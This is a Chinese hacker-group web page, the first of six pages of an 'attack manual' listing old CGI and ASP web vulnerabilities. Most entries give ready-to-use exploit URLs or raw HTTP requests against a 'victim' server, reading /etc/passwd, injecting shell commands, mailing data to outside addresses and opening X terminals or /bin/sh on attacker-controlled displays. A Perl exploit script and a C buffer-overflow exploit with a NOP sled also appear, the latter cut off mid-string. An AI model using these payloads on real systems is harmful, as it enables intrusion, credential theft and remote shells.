网络程序攻击手册 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文	用户登录新用户注册

网络程序攻击手册

热荐 ★★★

【字体：小大】

网络程序攻击手册

作者：未知文章来源：CnXHacker.Net 点击数：更新时间：2004-11-7

文章作者：无用君[ISFOCUS]

前一段拜读了小许的《CGI漏洞攻击手册version-0.02》，觉得这种文章的确很重要，但现在的网络程序攻击已不仅仅局限于CGI和pl程序了，所以这回从网上找来了一些常见的asp程序漏洞并加了进来，改名为《网络程序攻击手册》并且修正了原来《CGI漏洞攻击手册version-0.02》那段攻击Count.cgi程序的不完整性，希望对大家有所帮助！

一. phf漏洞
　这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:

　 lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

　但是我们还能找到它吗?

二. php.cgi 2.0beta10或更早版本的漏洞
　可以读nobody权限的所有文件.

　 lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

　 php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd、/etc/security/passwd等.

三. whois_raw.cgi

　 lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
　 lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

四. faxsurvey

　 lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

五. textcounter.pl
　如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.

　 #!/usr/bin/perl
　 $URL='http://dtp.kappa.ro/a/test.shtml';　　# please _DO_ _modify_ this
　 $EMAIL='pdoru@pop3.kappa.ro,root';　　　　　 # please _DO_ _modify_ this
　 if ($ARGV[0]) {　 $CMD=$ARGV[0];}else{
　　 $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail $ -sanothere_one";
　 }$text="$/;IFS=8;$;echo|";$text =~ s/ /$/g;#print "$textn";
　 system( "wget", $text, "-O/dev/null");
　 system( "wget", $text, "-O/dev/null");
　 #system( "lynx", $text); #如果没有wget命令也可以用lynx
　 #system( "lynx", $text);　

六. 一些版本(1.1)的info2www的漏洞
　 $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami　　 $
　 You have new mail.
　 $

　说实在我不太明白.:(

七. pfdispaly.cgi

　 lynx -source
　 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

　 pfdisplay.cgi还有另外一个漏洞可以执行命令

　 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
　 or
　 lynx -dump
　 http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

八. wrap

　 lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

九. www-sql
　可以让你读一些受限制的页面如:
　在你的浏览器里输入:http://your.server/protected/something.html:
　被要求输入帐号和口令.而有www-sql就不必了:

　 http://your.server/cgi-bin/www-sql/protected/something.html:

十. view-source

　 lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
　　
十一.campas

　 lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais

　 telnet www.victim.com 80
　 POST /cgi-bin/webgais HTTP/1.0
　 Content-length: 85 (replace this with the actual length of the "exploit"line)
　 query=';mail+drazvan@pop3.kappa.ro
十三.websendmail

　 telnet www.victim.com 80
　 POST /cgi-bin/websendmail HTTP/1.0
　 Content-length: xxx (should be replaced with the actual length of the
　 string passed to the server, in this case xxx=90)
　 receiver=;mail+your_address@somewhere.org
十四.handler

　 telnet www.victim.com 80
　 GET /cgi-bin/handler/useless_shit;cat　 /etc/passwd|?data=DownloadHTTP/1.0
　 or
　 GET /cgi-bin/handler/blah;xwsh　-display　　　　yourhost.com|?data=Download
　 or
　 GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download

　注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
　
十五.test-cgi

　 lynx http://www.victim.com/cgi-bin/test-cgi?whatever
　 CGI/1.0 test script report:

　 argc is 0. argv is .

　 SERVER_SOFTWARE = NCSA/1.4B
　 SERVER_NAME = victim.com
　 GATEWAY_INTERFACE = CGI/1.1
　 SERVER_PROTOCOL = HTTP/1.0
　 SERVER_PORT = 80
　 REQUEST_METHOD = GET
　 HTTP_ACCEPT = text/plain, application/x-html, application/html,
　 text/html, text/x-html
　 PATH_INFO =
　 PATH_TRANSLATED =
　 SCRIPT_NAME = /cgi-bin/test-cgi
　 QUERY_STRING = whatever
　 REMOTE_HOST = fifth.column.gov
　 REMOTE_ADDR = 200.200.200.200
　 REMOTE_USER =
　 AUTH_TYPE =
　 CONTENT_TYPE =
　 CONTENT_LENGTH =
　得到一些http的目录
　
　 lynx http://www.victim.com/cgi-bin/test-cgi?help&0a/bin/cat%20/etc/passwd
　这招好象并不管用.:(
　 lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
　还可以这样试
　　　 GET /cgi-bin/test-cgi?* HTTP/1.0
　　　 GET /cgi-bin/test-cgi?x *
　　　 GET /cgi-bin/nph-test-cgi?* HTTP/1.0
　　　 GET /cgi-bin/nph-test-cgi?x *
　　　 GET /cgi-bin/test-cgi?x HTTP/1.0 *
　　　 GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

　
十六.对于某些BSD的apache可以:

　 lynx http://www.victim.com/root/etc/passwd
　 lynx http://www.victim.com/~root/etc/passwd
　
十七.htmlscript

　 lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c

　 The demo cgi program jj.c calls /bin/mail without filtering user
　 input, so any program based on jj.c could potentially be exploited by
　 simply adding a　 followed by a Unix command. It may require a
　 password, but two known passwords include HTTPdrocks and SDGROCKS. If
　 you can retrieve a copy of the compiled program running strings on it
　 will probably reveil the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

十九.Frontpage extensions
　如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
　和它在服务器上的路径. 还有一些密码文件如:

　 http://www.victim.com/_vti_pvt/service.pwd
　 http://www.victim.com/_vti_pvt/users.pwd
　 http://www.victim.com/_vti_pvt/authors.pwd
　 http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
　没有碰到过,觉的有些地方不能搞错,所以直接贴英文.

　 John Carlton　found following.　 He developed　an exploit　for the
　 free web stats services offered at freestats.com, and supplied the
　 webmaster with proper code to patch the bug.

　 Start an　account with　freestats.com, and　log in.　 Click on the
　 area that　says "CLICK　HERE TO　EDIT YOUR　USER PROFILE & COUNTER
　 INFO" This will　call up a　file called edit.pl　with your user　#
　 and password included in it.　Save this file to your hard disk and
　 open it　with notepad.　 The only　form of　security in　this is a
　 hidden　attribute　on　the　form　element　of your account number.
　 Change this from

　　　 *input type=hidden name=account value=your#*

　 to

　　　 *input type=text name=account value=""*

　 Save your page and load it into your browser.　Their will now be a
　 text input box where the hidden element was before.　Simply type a
　 # in and push the "click here to update user profile" and all　the
　 information that appears　on your screen　has now been　written to
　 that user profile.

　 But that isn't the worst of it.　By using frames (2 frames, one to
　 hold this page　you just made,　and one as　a target for　the form
　 submission) you could change the password on all of their accounts
　 with a simple javascript function.

　 Deep inside the web site authors still have the good old "edit.pl"
　 script. It takes some time to reach it (unlike the path described)
　 but you can reach it directly at:

　　　 http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

二十一.Vulnerability in Glimpse HTTP

　 telnet target.machine.com 80
　 GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com　　 HTTP/1.0

二十二.Count.cgi
　该程序只对Count.cgi 24以下版本有效：

　 /*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);

/* Constants */
char shell[]=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x

[1] [2] [3] [4] [5] [6] 下一页

文章录入：IceRiver 责任编辑：IceRiver

上一篇文章：动力文章系统入侵

下一篇文章：一次通过注入侵渗透USA网站过程

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				XSS漏洞另一个攻击趋势 “伪颗粒”变种后台秘密监视灰鸽子变种NH远程控制用户偷 06月27日病毒播报 Data URI XSS与验证About XH 微软将超1亿收购语义搜索Pow 近期警惕：黑客利用高考查分 "木马点击器"泛滥点击欺诈威 XP获死缓两年 Vista全面推广卖场现200元电脑低价二手电

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM